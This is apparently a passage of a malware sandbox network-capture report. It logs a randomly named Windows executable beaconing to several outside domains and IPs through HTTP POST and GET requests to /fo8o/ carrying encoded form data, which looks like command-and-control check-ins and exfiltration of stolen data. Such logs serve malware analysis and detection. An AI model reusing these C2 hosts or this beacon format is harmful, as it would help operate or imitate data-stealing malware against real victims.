PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.9	49713	116.50.37.244	80	3852	C:\Program Files (x86)\tAumOGNztmKjBOhxUDthMJDWZRkLqisWfBPZFXRxHNIYbXLXFECKFqFVygmmzySNmblwteBsruUko\YtGWSBzTzAeRZwtsgUUux.exe

Timestamp	Bytes transferred	Direction	Data
Dec 31, 2024 09:29:15.831110001 CET	812	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.goldenjade-travel.com Origin: http://www.goldenjade-travel.com Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 217 Referer: http://www.goldenjade-travel.com/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 42 52 31 34 3d 47 48 69 4b 78 65 34 51 36 56 68 4b 4c 2b 38 4d 59 48 7a 74 74 63 45 79 78 36 49 63 6a 78 36 42 71 4d 49 4c 35 70 6d 57 4a 4a 49 67 4e 4e 5a 73 74 39 55 32 79 4d 43 39 72 62 30 34 44 61 2f 4e 2f 79 65 36 36 4d 5a 44 48 74 76 63 4b 73 66 4e 62 64 44 56 77 78 59 62 68 33 49 42 6c 34 6f 55 62 37 2b 37 47 5a 41 4d 57 31 6b 47 43 73 6e 30 4a 45 6d 4f 75 35 50 55 78 76 76 30 6b 59 5a 50 72 4e 6b 67 44 5a 4b 4f 5a 4a 43 6f 6b 32 56 4c 70 76 36 4c 44 54 62 32 52 2f 65 78 50 57 71 70 45 38 71 52 6b 5a 74 32 71 6b 44 69 54 6c 36 75 65 6c 78 31 4e 77 62 79 42 6d 51 75 41 5a 72 6a 4d 6e 42 58 6e 43 59 61 2f 42 55 43 78 71 63 36 6e 51 3d 3d Data Ascii: BR14=GHiKxe4Q6VhKL+8MYHzttcEyx6Icjx6BqMIL5pmWJJIgNNZst9U2yMC9rb04Da/N/ye66MZDHtvcKsfNbdDVwxYbh3IBl4oUb7+7GZAMW1kGCsn0JEmOu5PUxvv0kYZPrNkgDZKOZJCok2VLpv6LDTb2R/exPWqpE8qRkZt2qkDiTl6uelx1NwbyBmQuAZrjMnBXnCYa/BUCxqc6nQ==
Dec 31, 2024 09:29:16.725893974 CET	492	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=us-ascii Server: Microsoft-HTTPAPI/2.0 Date: Tue, 31 Dec 2024 08:29:15 GMT Connection: close Content-Length: 315 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.9	49714	116.50.37.244	80	3852	C:\Program Files (x86)\tAumOGNztmKjBOhxUDthMJDWZRkLqisWfBPZFXRxHNIYbXLXFECKFqFVygmmzySNmblwteBsruUko\YtGWSBzTzAeRZwtsgUUux.exe

Timestamp	Bytes transferred	Direction	Data
Dec 31, 2024 09:29:18.363711119 CET	1825	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.goldenjade-travel.com Origin: http://www.goldenjade-travel.com Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 1229 Referer: http://www.goldenjade-travel.com/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 42 52 31 34 3d 47 48 69 4b 78 65 34 51 36 56 68 4b 4c 2b 38 4d 59 48 7a 74 74 63 45 79 78 36 49 63 6a 78 36 42 71 4d 49 4c 35 70 6d 57 4a 4a 41 67 4e 34 4e 73 75 63 55 32 7a 4d 43 39 30 72 30 35 44 61 2b 4e 2f 7a 32 32 36 4d 56 54 48 75 58 63 4c 4a 44 4e 4d 2f 6e 56 70 68 59 62 73 58 49 41 71 59 70 4f 62 36 4f 2f 47 5a 51 4d 57 31 6b 47 43 75 2f 30 50 52 4b 4f 6f 35 50 58 32 76 76 6f 79 6f 59 53 72 4e 38 4b 44 59 2f 37 5a 2f 79 6f 71 31 74 4c 73 64 43 4c 4f 54 62 30 53 2f 65 70 50 57 6d 36 45 38 6d 64 6b 59 49 62 71 6e 54 69 65 78 6a 78 4c 33 4e 5a 52 78 6e 6e 4c 6d 38 7a 47 66 75 46 57 32 35 65 38 33 59 2f 75 7a 4e 41 38 70 59 79 36 61 70 35 31 77 37 47 76 59 53 59 56 49 73 2f 49 33 72 38 67 37 5a 62 6a 2f 7a 74 4f 46 34 35 65 5a 53 46 67 66 61 42 6e 50 75 52 41 4f 73 6e 32 58 74 32 56 70 38 48 75 46 47 77 38 37 38 2b 67 4e 32 42 72 79 6c 64 77 4e 46 47 67 41 5a 53 49 78 6b 7a 66 67 73 71 50 41 50 61 68 70 39 4c 55 68 44 41 77 48 65 4d 57 4a 74 6d 53 4b 36 4f 65 43 44 54 68 56 6a 42 45 37 7a 4a 4a [TRUNCATED] Data Ascii: BR14=GHiKxe4Q6VhKL+8MYHzttcEyx6Icjx6BqMIL5pmWJJAgN4NsucU2zMC90r05Da+N/z226MVTHuXcLJDNM/nVphYbsXIAqYpOb6O/GZQMW1kGCu/0PRKOo5PX2vvoyoYSrN8KDY/7Z/yoq1tLsdCLOTb0S/epPWm6E8mdkYIbqnTiexjxL3NZRxnnLm8zGfuFW25e83Y/uzNA8pYy6ap51w7GvYSYVIs/I3r8g7Zbj/ztOF45eZSFgfaBnPuRAOsn2Xt2Vp8HuFGw878+gN2BryldwNFGgAZSIxkzfgsqPAPahp9LUhDAwHeMWJtmSK6OeCDThVjBE7zJJJx0btYqpNJOfJCLFbfhZZiwlYB9p5dkODFcSUOpz0h/mwyF5OM906gm7ZV03J6dK1Vxfgojz6iB4QpOPRMWcky42D/oIJ1pT3UmuK2Az5QXmbpeyX1yMz8KdBrvpVD3U3zmeu86O+GkCmNwX7rIVVF2LUcy6eXP9nkfrU7Xe0LSzMQUjipgC0OFC+ysq4gVMyzhAUv5wjigzPxGkCcwpVY3ioHjiiFIvQ6AR1C7nWpC0AbLbINrRZBo41FGochAMd9lLXnbOPtkcducNwDuKC5wB0AP1f84YZ09258fuYuufGt2tOv07EEjip0f+IC43q6hgqJy7WG5UaAFhRSCFL8fJB811ZdR99dj673g9HYGAaYvS8sc4vB6QuIH5qotHd7tq24kPraiFJorMXFFxGOlPCb6OycxWPuXwhqxek4SDhtziKvovtMg55GjL2IKTMziObUwwUdR72sIEtpAkWNkAqTIJpkHg4uqwAv6mr+TD8UEUhA4XPI/CgSFc5Fh2kFsQDETr4Qh/BCHSAZhAb5fku4D+LTGrHaaeFgmhC6DQ5MMMB8tGzkJkV2rquBdNV6Cr6Yfio2aU+9xpBC1sUoqK3ZE/bsJ37X0QG5RyrK4VxqWwZyq+u6XHJBDkdRUrdBIcbcSD64dfRpK5Q1KR/hyTPVIyW3xQCC [TRUNCATED]
Dec 31, 2024 09:29:19.226843119 CET	492	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=us-ascii Server: Microsoft-HTTPAPI/2.0 Date: Tue, 31 Dec 2024 08:29:18 GMT Connection: close Content-Length: 315 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.9	49715	116.50.37.244	80	3852	C:\Program Files (x86)\tAumOGNztmKjBOhxUDthMJDWZRkLqisWfBPZFXRxHNIYbXLXFECKFqFVygmmzySNmblwteBsruUko\YtGWSBzTzAeRZwtsgUUux.exe

Timestamp	Bytes transferred	Direction	Data
Dec 31, 2024 09:29:20.893740892 CET	508	OUT	GET /fo8o/?D0=YnO0xF1X40&BR14=LFKqyrcu7g1NCa8cV1r2tNkohroduT6prIMLtaWgKJ9bBKQr4dsnyMPFpMQjJLGR7ieyxupOSpv1HbfUaMaFgSElgiguhIU1cq+9C59UXHMaDdPWVQ== HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Host: www.goldenjade-travel.com Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Dec 31, 2024 09:29:21.787378073 CET	492	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=us-ascii Server: Microsoft-HTTPAPI/2.0 Date: Tue, 31 Dec 2024 08:29:20 GMT Connection: close Content-Length: 315 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.9	49716	85.159.66.93	80	3852	C:\Program Files (x86)\tAumOGNztmKjBOhxUDthMJDWZRkLqisWfBPZFXRxHNIYbXLXFECKFqFVygmmzySNmblwteBsruUko\YtGWSBzTzAeRZwtsgUUux.exe

Timestamp	Bytes transferred	Direction	Data
Dec 31, 2024 09:29:35.178477049 CET	767	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.magmadokum.com Origin: http://www.magmadokum.com Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 193 Referer: http://www.magmadokum.com/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 42 52 31 34 3d 6e 4a 66 48 4a 5a 79 53 51 6d 6f 6b 62 4a 72 44 58 6d 7a 45 6b 6b 4b 2b 65 41 4e 6a 6e 42 2f 58 63 78 41 41 64 50 47 4a 53 64 6c 77 41 6f 2b 4c 59 71 50 65 6a 7a 49 30 2b 38 47 36 31 68 36 56 71 51 5a 2f 6e 41 31 35 43 52 7a 30 6f 38 31 47 64 7a 57 32 62 6b 49 42 59 36 52 64 37 4f 63 4a 47 69 32 32 38 68 6b 69 56 41 77 4b 42 66 6f 6d 64 51 57 2f 43 53 33 4a 47 2f 59 53 5a 70 63 58 66 74 30 42 75 77 6c 44 43 67 4f 4f 50 7a 4a 35 30 6b 54 61 43 73 48 69 48 6b 71 2f 30 30 2b 52 31 32 43 52 61 72 5a 65 62 51 36 71 65 47 52 36 62 73 5a 56 37 75 7a 35 56 43 53 66 Data Ascii: BR14=nJfHJZySQmokbJrDXmzEkkK+eANjnB/XcxAAdPGJSdlwAo+LYqPejzI0+8G61h6VqQZ/nA15CRz0o81GdzW2bkIBY6Rd7OcJGi228hkiVAwKBfomdQW/CS3JG/YSZpcXft0BuwlDCgOOPzJ50kTaCsHiHkq/00+R12CRarZebQ6qeGR6bsZV7uz5VCSf

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.9	49719	85.159.66.93	80	3852	C:\Program Files (x86)\tAumOGNztmKjBOhxUDthMJDWZRkLqisWfBPZFXRxHNIYbXLXFECKFqFVygmmzySNmblwteBsruUko\YtGWSBzTzAeRZwtsgUUux.exe

Timestamp	Bytes transferred	Direction	Data
Dec 31, 2024 09:29:37.797203064 CET	791	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.magmadokum.com Origin: http://www.magmadokum.com Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 217 Referer: http://www.magmadokum.com/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 42 52 31 34 3d 6e 4a 66 48 4a 5a 79 53 51 6d 6f 6b 61 71 44 44 56 42 76 45 6a 45 4b 2f 62 41 4e 6a 74 68 2f 54 63 78 38 41 64 4d 4c 55 54 6f 39 77 41 4a 69 4c 57 4c 50 65 67 7a 49 30 6d 73 47 2f 72 52 36 4f 71 51 55 63 6e 42 4a 35 43 52 50 30 6f 2b 74 47 65 44 71 31 61 30 49 44 56 61 52 44 6d 65 63 4a 47 69 32 32 38 68 67 49 56 41 6f 4b 42 4c 55 6d 53 56 71 77 4d 79 33 49 57 76 59 53 64 70 63 54 66 74 30 7a 75 78 49 6d 43 6c 43 4f 50 79 35 35 30 31 54 46 58 63 48 6b 44 6b 72 4c 38 55 6a 67 35 30 4b 35 45 36 30 35 44 6d 65 33 51 48 78 6b 4b 65 51 4f 75 35 7a 65 53 6c 62 33 4c 44 47 4d 32 32 4a 6f 37 54 73 7a 78 48 50 78 76 45 65 4b 35 51 3d 3d Data Ascii: BR14=nJfHJZySQmokaqDDVBvEjEK/bANjth/Tcx8AdMLUTo9wAJiLWLPegzI0msG/rR6OqQUcnBJ5CRP0o+tGeDq1a0IDVaRDmecJGi228hgIVAoKBLUmSVqwMy3IWvYSdpcTft0zuxImClCOPy5501TFXcHkDkrL8Ujg50K5E605Dme3QHxkKeQOu5zeSlb3LDGM22Jo7TszxHPxvEeK5Q==

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.9	49721	85.159.66.93	80	3852	C:\Program Files (x86)\tAumOGNztmKjBOhxUDthMJDWZRkLqisWfBPZFXRxHNIYbXLXFECKFqFVygmmzySNmblwteBsruUko\YtGWSBzTzAeRZwtsgUUux.exe

Timestamp	Bytes transferred	Direction	Data
Dec 31, 2024 09:29:40.391601086 CET	1804	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.magmadokum.com Origin: http://www.magmadokum.com Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 1229 Referer: http://www.magmadokum.com/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 42 52 31 34 3d 6e 4a 66 48 4a 5a 79 53 51 6d 6f 6b 61 71 44 44 56 42 76 45 6a 45 4b 2f 62 41 4e 6a 74 68 2f 54 63 78 38 41 64 4d 4c 55 54 6f 31 77 42 37 71 4c 57 73 54 65 76 54 49 30 76 4d 47 2b 72 52 36 44 71 52 39 56 6e 42 46 70 43 58 4c 30 71 64 6c 47 66 78 4f 31 52 30 49 44 4a 71 52 43 37 4f 63 6d 47 69 6d 79 38 67 51 49 56 41 6f 4b 42 4e 77 6d 62 67 57 77 4f 79 33 4a 47 2f 59 6b 5a 70 64 32 66 74 38 6a 75 78 4e 54 43 52 2b 4f 4d 53 70 35 35 6a 2f 46 56 38 48 6d 45 6b 72 54 38 55 76 37 35 30 6e 56 45 36 42 55 44 68 79 33 54 69 55 4d 61 74 73 6d 2f 72 43 70 61 30 37 2b 45 6d 4b 50 33 48 63 2b 76 79 6b 44 69 48 6d 48 36 46 54 46 69 4a 4a 63 65 38 72 2b 51 30 59 77 4c 51 43 4e 33 73 52 45 68 32 64 6f 47 4d 63 6e 49 67 53 73 4a 32 4b 71 68 33 30 78 30 4b 4d 52 54 4f 4f 67 38 54 78 55 44 54 31 61 67 53 4a 65 41 49 33 38 77 37 74 69 2b 73 6b 58 6e 4d 4b 2f 55 2f 4a 50 4f 73 39 34 51 49 70 78 55 77 32 4d 67 4d 47 39 78 67 77 68 57 74 75 72 44 7a 73 68 43 41 76 54 6d 64 50 70 2f 70 2b 44 33 6b 6f 64 32 [TRUNCATED] Data Ascii: BR14=nJfHJZySQmokaqDDVBvEjEK/bANjth/Tcx8AdMLUTo1wB7qLWsTevTI0vMG+rR6DqR9VnBFpCXL0qdlGfxO1R0IDJqRC7OcmGimy8gQIVAoKBNwmbgWwOy3JG/YkZpd2ft8juxNTCR+OMSp55j/FV8HmEkrT8Uv750nVE6BUDhy3TiUMatsm/rCpa07+EmKP3Hc+vykDiHmH6FTFiJJce8r+Q0YwLQCN3sREh2doGMcnIgSsJ2Kqh30x0KMRTOOg8TxUDT1agSJeAI38w7ti+skXnMK/U/JPOs94QIpxUw2MgMG9xgwhWturDzshCAvTmdPp/p+D3kod2l+4YvNn23tJipx85/rQsbb3tgjLhyi4g5fehCShG7oCKTUnlOGH7C/MLlLCFBepNCelwLd4FLiBmuRpWPONduHH5uTpVuvEswztqX9H0/4C93V5FciD6jh4S6IfuEsb550muWnceqjpZzyLMUiLSoJVqQL+zcWCniw0Hh4lfSGARHNWdetJURpb1cKc4BoreaHUzlfjjpBwHTFbksl7A5N0cWMSWF0+ax5mCqNg80J413kpZGCaX/mWbKQtKZD+KDffiiWCYdQ61Ao7JjvfTYaF8Dk1c22QF5xPtr/FfWSvnx9Y8/VtwPzaa22k/4lUJBcmXxOFtd/UQ1Eay20bWS+lfq/3HNV2dIznfcbuS0ZzXkAM0kcq/x1xC913I7O85b6Isp2iKns2FG0ACDO9oF2Sr9/hjdA6nlyorsVmx780qZwg1WSZcErDIou1XMEmuPvfDPGyScxmCVIh1rcf43NbeSoYEduOSor2km3pdEKGHckjSQfqIb1lpFuBxDo4pNHGW8suZ/s8tRkactdDWS30bXoUJUNTKsKsVOKSEqzRQKJS+Zo005P4bcnEr+CDbsAuE6mbrFEwvx+MPTnYDEzS7Cx+lIy5mQXGlsJCA6HBlghDeegpadcpcG/+gK1ZeJN+VqKndAN6qWtwWVvuWOl/agrk2iI8FgM [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.9	49722	85.159.66.93	80	3852	C:\Program Files (x86)\tAumOGNztmKjBOhxUDthMJDWZRkLqisWfBPZFXRxHNIYbXLXFECKFqFVygmmzySNmblwteBsruUko\YtGWSBzTzAeRZwtsgUUux.exe

Timestamp	Bytes transferred	Direction	Data
Dec 31, 2024 09:29:42.926186085 CET	501	OUT	GET /fo8o/?D0=YnO0xF1X40&BR14=qL3nKp+YSjoaTomgQjyPoknaJzFflnvGMW8DXsDTZ4AADrD7Wpn1i04piMS1+AOWgCBMohpgbh6Cuut9PSzjckokWPFlpLgmRSSw2BhiETUwcdg1EQ== HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Host: www.magmadokum.com Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Dec 31, 2024 09:30:43.689555883 CET	194	IN	HTTP/1.0 504 Gateway Time-out Cache-Control: no-cache Connection: close Content-Type: text/html Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 34 20 47 61 74 65 77 61 79 20 54 69 6d 65 2d 6f 75 74 3c 2f 68 31 3e 0a 54 68 65 20 73 65 72 76 65 72 20 64 69 64 6e 27 74 20 72 65 73 70 6f 6e 64 20 69 6e 20 74 69 6d 65 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><body><h1>504 Gateway Time-out</h1>The server didn't respond in time.</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.9	49723	91.195.240.94	80	3852	C:\Program Files (x86)\tAumOGNztmKjBOhxUDthMJDWZRkLqisWfBPZFXRxHNIYbXLXFECKFqFVygmmzySNmblwteBsruUko\YtGWSBzTzAeRZwtsgUUux.exe

Timestamp	Bytes transferred	Direction	Data
Dec 31, 2024 09:30:48.725971937 CET	770	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.rssnewscast.com Origin: http://www.rssnewscast.com Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 193 Referer: http://www.rssnewscast.com/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 42 52 31 34 3d 38 31 4c 31 38 78 65 33 79 6e 4b 77 57 2f 30 4f 35 68 55 50 58 53 72 57 2b 48 41 41 67 71 54 52 6e 45 64 72 65 38 43 58 47 36 77 51 38 50 36 48 62 41 42 6c 4f 4c 58 79 36 76 68 69 4b 58 52 70 69 39 36 54 66 55 62 67 30 62 74 76 71 77 54 4c 6d 76 78 47 2b 35 30 31 68 58 36 4f 4d 6c 71 59 38 42 31 44 57 54 59 4b 41 6c 2f 30 49 45 41 66 6f 68 73 4c 30 56 6c 4a 66 58 39 55 41 2b 4d 6b 55 6c 31 54 53 70 31 59 54 43 7a 54 5a 7a 77 6c 33 62 53 4a 6b 45 46 73 6b 36 4b 5a 6b 37 44 38 6f 39 38 51 63 4e 41 56 72 43 4d 46 39 71 6d 79 74 67 69 69 54 57 7a 56 31 67 5a 57 Data Ascii: BR14=81L18xe3ynKwW/0O5hUPXSrW+HAAgqTRnEdre8CXG6wQ8P6HbABlOLXy6vhiKXRpi96TfUbg0btvqwTLmvxG+501hX6OMlqY8B1DWTYKAl/0IEAfohsL0VlJfX9UA+MkUl1TSp1YTCzTZzwl3bSJkEFsk6KZk7D8o98QcNAVrCMF9qmytgiiTWzV1gZW
Dec 31, 2024 09:30:49.372072935 CET	707	IN	HTTP/1.1 405 Not Allowed date: Tue, 31 Dec 2024 08:30:49 GMT content-type: text/html content-length: 556 server: Parking/1.0 connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 